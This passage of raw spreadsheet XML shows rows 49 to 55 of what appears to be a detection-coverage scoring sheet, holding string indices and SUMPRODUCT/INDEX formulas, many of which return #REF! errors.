        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O49" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P49" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q49" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R49" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S49" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T49" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U49" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V49" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W49" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X49" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F49&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F49))-LEN(SUBSTITUTE(TRIM(F49),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y49" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="50" spans="1:25" ht="185.25" x14ac:dyDescent="0.45">
      <c r="A50" s="8" t="s">
        <v>130</v>
      </c>
      <c r="B50" s="8" t="s">
        <v>4</v>
      </c>
      <c r="C50" s="8" t="s">
        <v>484</v>
      </c>
      <c r="D50" s="10" t="s">
        <v>485</v>
      </c>
      <c r="E50" s="10" t="s">
        <v>424</v>
      </c>
      <c r="F50" s="10" t="s">
        <v>324</v>
      </c>
      <c r="G50" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K50,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H50" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I50" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J50" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K50" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L50" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M50" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N50" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O50" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P50" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q50" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R50" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S50" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T50" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U50" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V50" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W50" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X50" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F50&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F50))-LEN(SUBSTITUTE(TRIM(F50),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y50" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="51" spans="1:25" ht="142.5" x14ac:dyDescent="0.45">
      <c r="A51" s="8" t="s">
        <v>120</v>
      </c>
      <c r="B51" s="8" t="s">
        <v>344</v>
      </c>
      <c r="C51" s="8" t="s">
        <v>486</v>
      </c>
      <c r="D51" s="10" t="s">
        <v>487</v>
      </c>
      <c r="E51" s="10" t="s">
        <v>488</v>
      </c>
      <c r="F51" s="10" t="s">
        <v>489</v>
      </c>
      <c r="G51" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K51,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H51" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I51" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J51" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K51" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L51" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M51" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N51" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O51" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P51" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q51" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R51" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S51" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T51" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U51" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V51" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W51" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X51" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F51&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F51))-LEN(SUBSTITUTE(TRIM(F51),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y51" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="52" spans="1:25" ht="156.75" x14ac:dyDescent="0.45">
      <c r="A52" s="8" t="s">
        <v>108</v>
      </c>
      <c r="B52" s="8" t="s">
        <v>5</v>
      </c>
      <c r="C52" s="8" t="s">
        <v>490</v>
      </c>
      <c r="D52" s="10" t="s">
        <v>491</v>
      </c>
      <c r="E52" s="10" t="s">
        <v>492</v>
      </c>
      <c r="F52" s="10" t="s">
        <v>429</v>
      </c>
      <c r="G52" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K52,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H52" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I52" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J52" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K52" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L52" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M52" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N52" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O52" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P52" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q52" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R52" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S52" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T52" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U52" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V52" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W52" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X52" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F52&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F52))-LEN(SUBSTITUTE(TRIM(F52),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y52" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="53" spans="1:25" ht="85.5" x14ac:dyDescent="0.45">
      <c r="A53" s="8" t="s">
        <v>87</v>
      </c>
      <c r="B53" s="8" t="s">
        <v>8</v>
      </c>
      <c r="C53" s="8" t="s">
        <v>493</v>
      </c>
      <c r="D53" s="10" t="s">
        <v>494</v>
      </c>
      <c r="E53" s="10" t="s">
        <v>495</v>
      </c>
      <c r="F53" s="10" t="s">
        <v>496</v>
      </c>
      <c r="G53" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K53,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H53" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I53" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J53" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K53" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L53" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M53" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N53" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O53" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P53" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q53" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R53" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S53" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T53" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U53" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V53" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W53" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X53" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F53&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F53))-LEN(SUBSTITUTE(TRIM(F53),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y53" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="54" spans="1:25" ht="242.25" x14ac:dyDescent="0.45">
      <c r="A54" s="8" t="s">
        <v>132</v>
      </c>
      <c r="B54" s="8" t="s">
        <v>497</v>
      </c>
      <c r="C54" s="8" t="s">
        <v>498</v>
      </c>
      <c r="D54" s="10" t="s">
        <v>499</v>
      </c>
      <c r="E54" s="10" t="s">
        <v>500</v>
      </c>
      <c r="F54" s="10" t="s">
        <v>501</v>
      </c>
      <c r="G54" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K54,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H54" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataQuality-Scores'!A$3:A$59&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataQuality-Scores'!B$3:B$59)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="I54" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'Team-Scores'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'Team-Scores'!F$2:F$59)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="J54" s="51">
        <f>FLOOR(SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$59&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataSource-Tool-Coverage'!P$2:P$59)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1),1)</f>
        <v>0</v>
      </c>
      <c r="K54" s="51">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="L54" s="20">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataSource-Tool-Coverage'!$B$2:$B$45)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1)</f>
        <v>0</v>
      </c>
      <c r="M54" s="18" t="str">
        <f t="shared" si="1"/>
        <v>0-20</v>
      </c>
      <c r="N54" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="O54" s="18" t="e">
        <f t="shared" si="2"/>
        <v>#REF!</v>
      </c>
      <c r="P54" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Q54" s="18" t="e">
        <f t="shared" si="3"/>
        <v>#REF!</v>
      </c>
      <c r="R54" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="S54" s="18" t="e">
        <f t="shared" si="4"/>
        <v>#REF!</v>
      </c>
      <c r="T54" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="U54" s="18" t="e">
        <f t="shared" si="5"/>
        <v>#REF!</v>
      </c>
      <c r="V54" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="W54" s="18" t="e">
        <f t="shared" si="6"/>
        <v>#REF!</v>
      </c>
      <c r="X54" s="20" t="e">
        <f>SUMPRODUCT(ISNUMBER(SEARCH(""&amp;'DataSource-Tool-Coverage'!A$2:A$45&amp;","," "&amp;'Detailed Techniques'!F54&amp;","))+0,'DataSource-Tool-Coverage'!#REF!)/(LEN(TRIM(F54))-LEN(SUBSTITUTE(TRIM(F54),",",""))+1)</f>
        <v>#REF!</v>
      </c>
      <c r="Y54" s="18" t="e">
        <f t="shared" si="7"/>
        <v>#REF!</v>
      </c>
    </row>
    <row r="55" spans="1:25" ht="71.25" x14ac:dyDescent="0.45">
      <c r="A55" s="8" t="s">
        <v>174</v>
      </c>
      <c r="B55" s="8" t="s">
        <v>2</v>
      </c>
      <c r="C55" s="8" t="s">
        <v>502</v>
      </c>
      <c r="D55" s="10" t="s">
        <v>503</v>
      </c>
      <c r="E55" s="10" t="s">
        <v>504</v>
      </c>
      <c r="F55" s="10" t="s">
        <v>505</v>
      </c>
      <c r="G55" s="10" t="str">
        <f>INDEX('Score Defs'!A$3:A$8,MATCH('Detailed Techniques'!K55,'Score Defs'!B$3:B$8,0))</f>
        <v>None</v>
      </c>
      <c r="H55" s="51">
